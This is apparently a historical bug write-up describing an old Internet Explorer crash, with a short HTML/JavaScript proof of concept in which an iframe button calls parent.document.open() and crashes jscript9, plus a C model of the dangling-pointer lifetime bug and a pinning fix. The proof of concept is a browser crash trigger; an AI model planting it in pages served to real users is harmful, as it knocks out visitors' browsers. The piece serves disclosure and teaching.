This was a concise one. Calling parent.document.open() from inside an iFrame and then immediately executing any JavaScript instruction caused the browser to crash. The instruction after the document.open() call does not even need to be meaningful — assigning 1 to a variable is enough.

<iframe name="iFrame" width="400" height="80"></iframe>

<script language="JavaScript">
iFrame.document.write('<center><input type="button" onclick="parent.document.open(); a = 1;" value="CrashMe!"></center>');
iFrame.document.close();
</script>

The crash occurs in jscript9!ScriptEngine::OnScriptError when the engine tries to report the error condition that follows the document open. The document.open() call tears down the parent’s script environment while the iFrame’s script is still running, leaving a dangling pointer that the error handler then dereferences. Exploitability was classified as UNKNOWN.
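The lifetime problem described above, reduced to a small C model with the usual remedy of pinning the object for the duration of the call. This is an added example, not jscript9 code and not a description of how the bug was actually fixed; `ScriptEnv` and every function name are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>

/* Simplified lifetime model; every name here is hypothetical. */
typedef struct ScriptEnv {
    int refs;        /* owning document + in-flight callers */
    int torn_down;   /* set once document.open() has reset the document */
} ScriptEnv;

static int live_envs = 0;  /* observes frees without touching freed memory */

ScriptEnv *env_new(void) {
    ScriptEnv *e = calloc(1, sizeof *e);
    if (!e) abort();
    e->refs = 1; live_envs++;
    return e;
}
void env_addref(ScriptEnv *e) { e->refs++; }
void env_release(ScriptEnv *e) { if (--e->refs == 0) { live_envs--; free(e); } }

/* Models parent.document.open(): the document drops its owning reference. */
void document_open(ScriptEnv *e) { e->torn_down = 1; env_release(e); }

/* Models the error-reporting path: returns 1 if reported, 0 if dropped. */
int report_error(ScriptEnv *e) { return e->torn_down ? 0 : 1; }

/* Unpinned dispatch, stopped before the error path. Returns 1 if the
   environment is already freed at the point the error would be reported. */
int unpinned_frees_mid_call(void) {
    ScriptEnv *e = env_new();
    int before = live_envs;
    document_open(e);               /* sole reference dropped: e is freed */
    return live_envs == before - 1; /* e now dangles; it must not be used */
}

/* Pinned dispatch: a keep-alive reference spans the whole handler call. */
int run_handler_pinned(ScriptEnv *e) {
    env_addref(e);
    document_open(e);               /* torn down, but memory stays valid */
    int reported = report_error(e); /* sees torn_down and drops the report */
    env_release(e);                 /* last reference: freed after last use */
    return reported;
}

int main(void) {
    int freed = unpinned_frees_mid_call();
    int reported = run_handler_pinned(env_new());
    printf("unpinned freed=%d pinned reported=%d live=%d\n", freed, reported, live_envs);
    return 0;
}
```

The unpinned function stops before the error path on purpose: calling `report_error` there would read freed memory, which is the condition the crash reflects.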

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.